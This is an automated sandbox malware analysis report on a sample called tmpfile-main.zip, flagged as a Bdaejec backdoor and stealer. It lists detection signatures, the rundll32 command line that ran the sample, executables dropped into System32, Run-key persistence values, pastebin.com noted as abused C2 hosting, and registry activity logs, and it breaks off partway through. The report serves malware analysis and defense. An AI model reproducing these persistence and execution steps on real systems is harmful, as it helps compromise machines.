Malware Analysis Report

2025-01-22 14:33

Sample ID 241202-tmhlza1nez
Target tmpfile-main.zip
SHA256 d6c2f953a4c4b2f7bf58378855bbc3d38c1b4d686118ad899540e5778413788d
Tags
discovery execution persistence bdaejec aspackv2 backdoor evasion vmprotect spyware stealer themida privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d6c2f953a4c4b2f7bf58378855bbc3d38c1b4d686118ad899540e5778413788d

Threat Level: Known bad

The file tmpfile-main.zip was found to be: Known bad.

Malicious Activity Summary

discovery execution persistence bdaejec aspackv2 backdoor evasion vmprotect spyware stealer themida privilege_escalation

Suspicious use of NtCreateUserProcessOtherParentProcess

Bdaejec family

Detects Bdaejec Backdoor.

Bdaejec

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Checks BIOS information in registry

Event Triggered Execution: Component Object Model Hijacking

Executes dropped EXE

Themida packer

ASPack v2.12-2.42

VMProtect packed file

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Checks SCSI registry key(s)

Scheduled Task/Job: Scheduled Task

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Enumerates system info in registry

Uses Task Scheduler COM API

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-02 16:10

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

149s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\GasMask.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3516 wrote to memory of 3848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3516 wrote to memory of 3848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3516 wrote to memory of 3848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\GasMask.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\GasMask.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 233.17.178.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

150s

Max time network

158s

Command Line

winlogon.exe

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1704 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System32\$Node32.exe N/A
N/A N/A C:\Windows\System32\$Node2Json.exe N/A
N/A N/A C:\Windows\System32\$Node3Json.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\$Node2Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\System32\$Node3Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\$Node32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
File created C:\Windows\System32\$Node2Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
File opened for modification C:\Windows\System32\$Node3Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\$Node32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1704 set thread context of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\System32\$Node32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DFC104D" C:\Windows\System32\mousocoreworker.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733155995" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={96D533AC-157F-4C60-9416-4DFFA36B90DD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DFC104D" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 02 Dec 2024 16:13:18 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000079608f3fe9600b47995dccb833195b77000000000200000000001066000000010000200000004b808c6f93a0a9e82ca0d87f48f7132b15a1891cc8da7b4606926c70d5bad11a000000000e80000000020000200000007ee7ec795c23ebada55b29b931af9b61fe895cbcb8d57d1d1ce9246c2a1a8ec9b0030000aa377babee90ec6bd21215c40fc14da95b1bf260db3a2e5d06d135c1af9f172d2b3b09c7a576317e7eb648bba2b988064f37ac77e78131e4d6316a9b45f620a8822dcd0cf295425f53d0cb5b4341b6bde9293ff617e823c21c2b160e9c6dfd51753f6b18421ce67bf960eb00b080d0826dbe1a0341b343250628319141507549fa213224ffe5b2470d6e64d8caad6df28b75f802e3c0cfc609f85a0ab651a8c711fa54781f9214a5519a23bf4f27bbd04e26d70177915a3ab19d77e6f33d14188534b78f2d8442f6eceec00951f70d84c7c242342c7c9c6de5cbf37da0a8cc6bba9d6a6a3cdc764d12be7b644395c0e6daef73f880f92a85a0d53db95ad9b5e35049d23104c3cbf559b3cdf266098e8bcade3a3bbc3eb337162cc630c49e05dbd10045a0dba152e202e1f7b3267193aa8b69c5133694d6b3bc68532b9c406a4affbded646c71aa48360cb343681e1bf9e6811ea21c08c895e62aab9a406ca0efb2e3ac3ccdc280e1c66a738d6159d405536d2c91cdcd37b272a097998d6a45ed0b7be5aa6aa4a52d0a31a82153fc201fc9a535ca15055b39102f45e1cb3ba6d31e498d54e757125a24a20c6aed729fbf64267569467f100b56a696c6ce1c3fc4d2c8a4028a90c15e5b443c15264a0aac1c1d0f7cb02dae77526b1c0a69a7ccd2f3787ede6aca3b1ff307d6b4eeb74b3241bdc4c758a66ace28922078e8baaf714197818129b6c9adddf92114314ac2f5a829462e7e6de8fdd9f9e5b8ca2c7dd314f2064a6017f2dca35283a18246bf093e01edf58ff90e452905e15704306c3402f0f1c0d79a5a78cbce8ab064268f4d0adc946d2d1996c6358e8a3d32d15c234cecf89938ecf076701abe383951f7d64c782a86738b77111f3f883008ea8e987e4ef5501e18a37986f8c644fbf000dfc3c9f382df9fa8f38837f1fac4adb9bbc092e2e6d88b426c7bf3a070cdfc6e6733fc189aa073e322631bd26b2ed18b73f4f4a4229dd91d3c70efe1c33f22b0481ee1621084286cc9a4aa96d6afa0a2133cbeb003763d16cd7dc8a36346090b8a46771322ae89461de79bcaaaf468c32baeb92137dbb3eed18887bcfa8345c617aacba2b33d586f3da9ed89c9274b8908e0161d260f8a151634367cc54326b54fd5ebd408d532507175fc653ed48df0b3e07dff5b0648efcfe1cf2f01c08a4e61c1e0624b1fe7a4310af33acdabdb2d0e0adc5b1c36a9d87c232e4884f64249e167ac476682d5d52397b2a06c461d9636c87e9286fc2cf3f1f1bb9ad45d7d275f62ca573d21c7fe049fa5b16858ded5a390fb85cad7594a58a7917acf431b7bf6400000009b2ad73007e299b80abe49fa987c745dcf11bb8392100ecd31a59b2697f0db83835210a646e99b6fce6e42fb9b2fe1295b4138e280efb729d0ef6d84baefd62b C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A

Scheduled Task/Job: Scheduled Task

